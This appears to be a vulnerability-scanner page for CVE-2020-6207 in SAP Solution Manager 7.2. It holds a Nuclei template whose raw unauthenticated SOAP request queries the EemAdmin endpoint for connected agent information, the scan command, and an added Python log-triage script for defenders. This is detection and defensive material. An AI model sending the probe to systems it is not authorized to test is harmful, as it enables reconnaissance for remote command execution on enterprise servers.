SAP Solution Manager 7.2 - Remote Command Execution
ID: CVE-2020-6207
Severity: critical
Author: _generic_human_
Tags: cve2020,cve,sap,solman,rce,kev
Description
SAP Solution Manager (SolMan) running version 7.2 has a remote command execution vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem). The vulnerability occurs due to missing authentication checks when submitting SOAP requests to the /EemAdminService/EemAdmin page, which can be used to get information about connected SMDAgents, send HTTP requests (SSRF), and execute OS commands on a connected SMDAgent.
YAML Source
id: CVE-2020-6207

info:
  name: SAP Solution Manager 7.2 - Remote Command Execution
  author: _generic_human_
  severity: critical
  description: SAP Solution Manager (SolMan) running version 7.2 has a remote command execution vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem). The vulnerability occurs due to missing authentication checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, send HTTP request (SSRF), and execute OS commands on connected SMDAgent.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system.
  remediation: |
    Apply the latest security patches provided by SAP to mitigate this vulnerability.
  reference:
    - https://launchpad.support.sap.com/#/notes/2890213
    - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=540935305
    - https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf
    - https://github.com/chipik/SAP_EEM_CVE-2020-6207
    - https://www.rapid7.com/db/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce/
    - https://www.rapid7.com/db/modules/exploit/multi/sap/cve_2020_6207_solman_rs/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-6207
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-6207
    cwe-id: CWE-306
    epss-score: 0.97439
    epss-percentile: 0.99945
    cpe: cpe:2.3:a:sap:solution_manager:7.20:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sap
    product: solution_manager
  tags: cve2020,cve,sap,solman,rce,kev

http:
  - raw:
      - |
        POST /EemAdminService/EemAdmin HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: ""
        Content-Type: text/xml; charset=UTF-8
        Connection: close

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:adm="http://sap.com/smd/eem/admin/"><soapenv:Header/><soapenv:Body><adm:getAllAgentInfo/></soapenv:Body></soapenv:Envelope>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - ":Envelope"
          - ":Body"
          - ":getAllAgentInfoResponse"
        condition: and

      - type: word
        part: header
        words:
          - "text/xml"
          - "SAP NetWeaver Application Server"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402205ac1dea476a0e0189e2356bf63a8c7453e958c58fbdb99842df0bf8bf53fe7f502205ee7fb99bc1d0786a34a1320da4e4c73053a0d3a76b1077416c0ab1a21644a6c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-6207.yaml"
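
To complement the scan, the following added example (not part of the template or of the Nuclei project) triages web access logs for requests to the endpoint named in the description. It assumes a reverse proxy in front of SolMan that writes Combined Log Format and records the HTTP-authenticated user in the third field; the function names and the sample lines are constructed for illustration.

```python
import re

# Endpoint named in the advisory; the log format and verdict names are assumptions.
EEM_PATH = "/EemAdminService/EemAdmin"

# Combined Log Format: host ident authuser [time] "METHOD path proto" status size ...
CLF = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def classify(line):
    """Return (verdict, host, user, status) for EEM admin requests, else None."""
    m = CLF.match(line)
    if not m:
        return None
    # Ignore query string and trailing slash; compare case-insensitively
    # as a conservative choice so variants of the path are not missed.
    path = m["path"].split("?", 1)[0].rstrip("/")
    if path.lower() != EEM_PATH.lower():
        return None
    status = int(m["status"])
    anonymous = m["user"] == "-"   # no authenticated identity was logged
    if anonymous and status == 200:
        verdict = "ALERT"      # answered without credentials: consistent with CWE-306
    elif status in (401, 403):
        verdict = "blocked"    # authentication was enforced
    else:
        verdict = "review"     # authenticated or unusual status: confirm who and why
    return verdict, m["host"], m["user"], status

def triage(lines):
    """Classify every line and keep only those that touched the endpoint."""
    return [r for r in map(classify, lines) if r]

# Constructed sample lines (documentation and private address ranges).
SAMPLE = [
    '198.51.100.7 - - [12/Mar/2021:10:01:02 +0000] "POST /EemAdminService/EemAdmin HTTP/1.1" 200 1843 "-" "curl/7.68"',
    '198.51.100.7 - - [12/Mar/2021:10:05:09 +0000] "POST /EemAdminService/EemAdmin HTTP/1.1" 401 312 "-" "curl/7.68"',
    '10.0.0.5 - solman_admin [12/Mar/2021:10:06:00 +0000] "POST /EemAdminService/EemAdmin HTTP/1.1" 200 900 "-" "Java"',
    '10.0.0.9 - - [12/Mar/2021:10:07:00 +0000] "GET /index.html HTTP/1.1" 200 55 "-" "Mozilla"',
]

if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(*row)
```

An "ALERT" row means the endpoint answered a request that carried no logged identity, which is the behaviour the template's matchers look for; a "blocked" row is what the same request should produce once authentication is enforced.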